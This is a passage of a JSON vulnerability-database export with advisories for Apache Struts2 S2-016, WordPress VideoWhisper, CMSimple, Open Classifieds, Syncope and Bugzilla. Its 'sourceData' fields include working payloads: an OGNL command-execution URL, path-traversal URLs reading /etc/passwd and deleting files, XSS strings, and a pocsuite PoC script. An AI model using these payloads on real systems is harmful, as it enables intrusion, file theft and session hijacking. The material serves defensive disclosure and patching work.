Struts2\u7684action:\u3001redirect:\u548credirectAction:\u524d\u7f00\u53c2\u6570\u5728\u5b9e\u73b0\u5176\u529f\u80fd\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u4e86Ognl\u8868\u8fbe\u5f0f\uff0c\u5e76\u5c06\u7528\u6237\u901a\u8fc7URL\u63d0\u4ea4\u7684\u5185\u5bb9\u62fc\u63a5\u5165Ognl\u8868\u8fbe\u5f0f\u4e2d\uff0c\u4ece\u800c\u9020\u6210\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u6076\u610fURL\u6765\u6267\u884c\u4efb\u610fJava\u4ee3\u7801\uff0c\u8fdb\u800c\u53ef\u6267\u884c\u4efb\u610f\u547d\u4ee4\r\n\r\nredirect:\u548credirectAction:\u6b64\u4e24\u9879\u524d\u7f00\u4e3aStruts\u9ed8\u8ba4\u5f00\u542f\u529f\u80fd\uff0c\u76ee\u524dStruts 2.3.15.1\u4ee5\u4e0b\u7248\u672c\u5747\u5b58\u5728\u6b64\u6f0f\u6d1e\r\n\r\n\u76ee\u524dApache Struts2\u5df2\u7ecf\u57282.3.15.1\u4e2d\u4fee\u8865\u4e86\u8fd9\u4e00\u6f0f\u6d1e\u3002\u5f3a\u70c8\u5efa\u8baeApache Struts2\u7528\u6237\u68c0\u67e5\u60a8\u662f\u5426\u53d7\u6b64\u95ee\u9898\u5f71\u54cd\uff0c\u5e76\u5c3d\u5feb\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\r\n0\r\nApache Struts 2.0.0 - Apache Struts 2.3.15\r\n\u5382\u5546\u72b6\u6001\uff1a\r\n==========\r\n\u5382\u5546\u5df2\u7ecf\u53d1\u5e03Apache Struts 2.3.15.1\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u6f0f\u6d1e\uff0c\u5efa\u8baeStruts\u7528\u6237\u53ca\u65f6\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\u3002\r\n\r\n\u5382\u5546\u5b89\u5168\u516c\u544a\uff1aS2-016\r\n\u94fe\u63a5\uff1ahttp://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n\u8f6f\u4ef6\u5347\u7ea7\u9875\u9762\uff1ahttp://struts.apache.org/download.cgi#struts23151", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60906", "id": "SSV:60906", "title": "Apache Struts2 \u591a\u4e2a\u524d\u7f00\u53c2\u6570\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-2251)", "type": "seebug", "sourceData": "\n \u7531\u4e8eApache Struts2 \u5728\u6700\u65b0\u4fee\u8865\u7248\u672c2.3.15.1\u4e2d\u5df2\u7ecf\u7981\u7528\u4e86\u91cd\u5b9a\u5411\u53c2\u6570\uff0c\u56e0\u6b64\u53ea\u8981\u91cd\u5b9a\u5411\u529f\u80fd\u4ecd\u7136\u6709\u6548\uff0c\u5219\u8bf4\u660e\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/\r\n\r\n\u5982\u679c\u9875\u9762\u91cd\u5b9a\u5411\u5230www.yahoo.com\uff0c\u5219\u8868\u660e\u5f53\u524d\u7cfb\u7edf\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u3002\r\n\r\n\u9a8c\u8bc1\u8868\u8fbe\u5f0f\u89e3\u6790\u548c\u547d\u4ee4\u6267\u884c\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60906"}, {"lastseen": "2017-11-19T17:32:53", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65877\r\nCVE(CAN) ID: CVE-2014-1907\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u8f6f\u4ef6\u53ef\u4ee5\u5c06\u89c6\u9891\u5e7f\u64ad\u529f\u80fd\u6dfb\u52a0\u5230WordPress\u7ad9\u70b9\uff0c\u4e5f\u53ef\u5c06\u5b9e\u65f6\u89c6\u9891\u6d41\u6dfb\u52a0\u5230\u535a\u5ba2\u9875\u3002\r\n\r\nVideoWhisper Live Streaming Integration 4.27.3\u53ca\u5176\u4ed6\u7248\u672c\u6ca1\u6709\u6709\u6548\u8fc7\u6ee4\u811a\u672c"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php"\u5185\u7684"s" HTTP GET\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u5e8f\u5217\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u67e5\u770b\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\uff1b\u4e5f\u6ca1\u6709\u6709\u6548\u8fc7\u6ee4"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php"\u811a\u672c\u5185\u7684"s" HTTP GET\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u5e8f\u5217\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u5220\u9664\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u9700\u8981\u7cfb\u7edf\u4e0a\u5b58\u5728\u6587\u4ef6"/tmp/immuniweb"\u3002\n0\nWordPress VideoWhisper Live Streaming Integration <= 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n---------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttps://wordpress.org/plugins/videowhisper-live-streaming-integration/screenshots/", "modified": "2014-03-03T00:00:00", "published": "2014-03-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61614", "id": "SSV:61614", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n http://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\nhttp://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\n ", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61614"}, {"lastseen": "2017-11-19T17:31:32", "bulletinFamily": "exploit", "description": "Bugtraq ID:65866\r\nCVE ID:CVE-2014-1905\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u6240\u5305\u542b\u7684"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php"\u5728\u4e0a\u4f20\u6587\u4ef6\u5230\u670d\u52a1\u5668\u65f6\u6ca1\u6709\u6b63\u786e\u6821\u9a8c\u6076\u610f\u6587\u4ef6\u6269\u5c55\uff0c\u53ef\u5bfc\u81f4\u8fdc\u7a0b\u653b\u51fb\u8005\u4e0a\u4f20\u548c\u6267\u884c\u4efb\u610fPHP\u6587\u4ef6\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61679", "id": "SSV:61679", "title": "WordPress VideoWhisper Live Streaming Integration\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n After successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61679"}, {"lastseen": "2017-11-19T17:27:18", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0111\r\n\r\nApache Syncope\u662f\u7528\u5728\u4f01\u4e1a\u73af\u5883\u7684\u6570\u5b57\u8eab\u4efd\u7ba1\u7406,\u5728JEE\u6280\u672f\u7684\u5b9e\u65bd\u548cApache 2.0\u8bb8\u53ef\u4e0b\u53d1\u5e03\u7684\u5f00\u6e90\u7cfb\u7edf\u3002\r\n\r\nApache Syncope\u5904\u7406\u7279\u5236\u7684Apache Commons JEXL\u8868\u8fbe\u5f0f\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u901a\u8fc7\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u8fd0\u884cApache Syncope core\u7684JEE container\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nApache Syncope 1.0.0\r\nApache Syncope 1.0.8\r\nApache Syncope 1.1.0\r\nApache Syncope 1.1.6\nApache Syncope 1.0.9, 1.1.7\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://syncope.apache.org/", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62214", "id": "SSV:62214", "title": "Apache Syncope\u7279\u5236Commons JEXL\u8868\u8fbe\u5f0f\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:50", "bulletinFamily": "exploit", "description": "Bugtraq ID:66312\r\nCVE ID:CVE-2014-2219\r\n\r\nCMSimple\u662f\u4e00\u4e2a\u56fd\u5916\u5f00\u6e90\u7684\u7b80\u6613\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002\r\n\r\nCMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9"/whizzywig/wb.php"\u811a\u672c\u7684"d" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n0\r\nCMSimple 3.54\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/", "modified": "2014-03-25T00:00:00", "published": "2014-03-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61903", "id": "SSV:61903", "title": "CMSimple '/whizzywig/wb.php'\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\n\r\nclass TestPOC(POCBase):\r\n vulID = 'SSV-61903' # vul ID\r\n version = '1'\r\n author = 'fenghh'\r\n vulDate = '2014-03-25'\r\n createDate = '2015-10-14'\r\n updateDate = '2015-10-14'\r\n references = ['http://sebug.net/vuldb/ssvid-61903']\r\n name = 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e'\r\n appPowerLink = 'www.cmsimple.dk'\r\n appName = 'cmsimple'\r\n appVersion = '3.54'\r\n vulType = 'XSS'\r\n desc = ''' \r\n \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n '''\r\n # the sample sites for examine\r\n samples = ['']\r\n\r\n def _verify(self):\r\n output = Output(self)\r\n result = {}\r\n payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E'\r\n verify_url = self.url + payload\r\n content = req.get(verify_url).content\r\n if '<script>alert(\"sebug\")</script>' in content:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = verify_url\r\n output.success(result)\r\n else:\r\n output.fail('XSS Failed')\r\n return output\r\n\r\n def _attack(self): \r\n return self._verify()\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61903"}, {"lastseen": "2017-11-19T17:31:07", "bulletinFamily": "exploit", "description": "CVE ID\uff1aCVE-2014-2024\r\n\r\nOpen Classifieds\u53ef\u4ee5\u7528\u6765\u521b\u5efa\u5206\u7c7b\u548c\u76ee\u5f55\u3002\r\n\r\n\u7531\u4e8e\u6ca1\u6709\u5145\u5206\u8fc7\u6ee4\u901a\u8fc7URI\u4f20\u9012\u5230"/shared-apartments-rooms/" URL\u7684\u7528\u6237\u63d0\u4f9b\u7684\u6570\u636e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6b3a\u9a97\u767b\u5f55\u7528\u6237\u8bbf\u95ee\u6076\u610f\u94fe\u63a5\uff0c\u5e76\u5728\u53d7\u5f71\u54cd\u7f51\u7ad9\u4e0a\u4e0b\u6587\u7684\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\n0\nOpen Classifieds 2-2.1.2\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpen Classifieds\r\n-----\r\nOpen Classifieds 2-2.1.3\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\n\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61791", "id": "SSV:61791", "title": "Open Classifieds\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61791"}, {"lastseen": "2017-11-19T17:33:30", "bulletinFamily": "exploit", "description": "Bugtraq ID:65876\r\nCVE ID:CVE-2014-1906\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u5b58\u5728\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610f\u811a\u672c\u6216HTML\u4ee3\u7801\uff0c\u5f53\u6076\u610f\u6570\u636e\u88ab\u67e5\u770b\u65f6\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61677", "id": "SSV:61677", "type": "seebug", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T17:31:29", "bulletinFamily": "exploit", "description": "Bugtraq ID:65880\r\nCVE ID:CVE-2014-1908\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u811a\u672c\u4e0d\u6b63\u786e\u5b9e\u73b0\u9519\u8bef\u5904\u7406\u673a\u5236\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u63d0\u4ea4\u7279\u5236\u7684HTTP GET\u8bf7\u6c42\uff0c\u83b7\u53d6\u654f\u611f\u5e94\u7528\u4fe1\u606f\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\n\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61678", "id": "SSV:61678", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n The following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61678"}], "saint": [{"lastseen": "2018-08-31T00:08:13", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "id": "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "id": "SAINT:2FE5CCE51B64707F8D205A80240A6467", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "id": "SAINT:279F8312DEF0028C5D034325A810E73D", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:50", "bulletinFamily": "unix", "description": "\nA Bugzilla Security Advisory reports:\n\nThe login form had no CSRF protection, meaning that\n\t an attacker could force the victim to log in using the\n\t attacker's credentials. If the victim then reports a new\n\t security sensitive bug, the attacker would get immediate\n\t access to this bug.\n\n\t Due to changes involved in the Bugzilla API, this fix is\n\t not backported to the 4.0 and 4.2 branches, meaning that\n\t Bugzilla 4.0.12 and older, and 4.2.8 and older, will\n\t remain vulnerable to this issue.\n\n", "modified": "2014-04-18T00:00:00", "published": "2014-04-17T00:00:00", "id": "608ED765-C700-11E3-848C-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/608ed765-c700-11e3-848c-20cf30e32f6d.html", "title": "bugzilla -- Cross-Site Request Forgery", "type": "freebsd", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "cisco": [{"lastseen": "2017-09-26T15:33:38", "bulletinFamily": "software", "description": "A vulnerability in the DefaultActionMapper component could allow an unauthenticated, remote attacker to execute arbitrary commands on the targeted system.\n\nThe vulnerability is due to insufficient sanitization of user-supplied input. An attacker could exploit this vulnerability by sending crafted requests consisting of Object-Graph Navigation Language (OGNL) expressions. An exploit could allow the attacker to execute arbitrary code on the targeted system.\n\nMultiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. \n\nThe vulnerability is due to insufficient sanitization of user-supplied\ninput. An attacker could exploit this vulnerability by sending crafted requests\nconsisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An\nexploit could allow the attacker to execute arbitrary code on the targeted system. \n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.\n\nWorkarounds that mitigate this vulnerability are not available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2\"]", "modified": "2015-10-12T12:30:06", "published": "2013-10-23T16:00:00", "id": "CISCO-SA-20131023-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-01-28T04:06:43", "bulletinFamily": "exploit", "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not 